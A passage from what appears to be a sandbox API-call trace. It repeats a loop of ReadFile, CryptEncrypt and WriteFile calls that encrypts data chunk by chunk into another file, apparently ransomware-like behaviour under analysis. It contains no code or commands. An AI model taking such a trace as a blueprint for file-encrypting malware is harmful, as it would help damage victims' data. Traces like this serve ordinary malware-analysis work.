lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.469] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.469] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.469] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.469] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.470] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.470] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.470] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.470] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.470] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.470] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.471] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.471] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.471] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.471] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.471] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.472] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.472] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.473] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.473] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.474] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.474] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.475] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.475] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.475] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.475] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.475] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.475] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.475] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.475] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.476] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.476] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.477] CryptEncrypt (in: hKey=0x2faa48, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.477] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 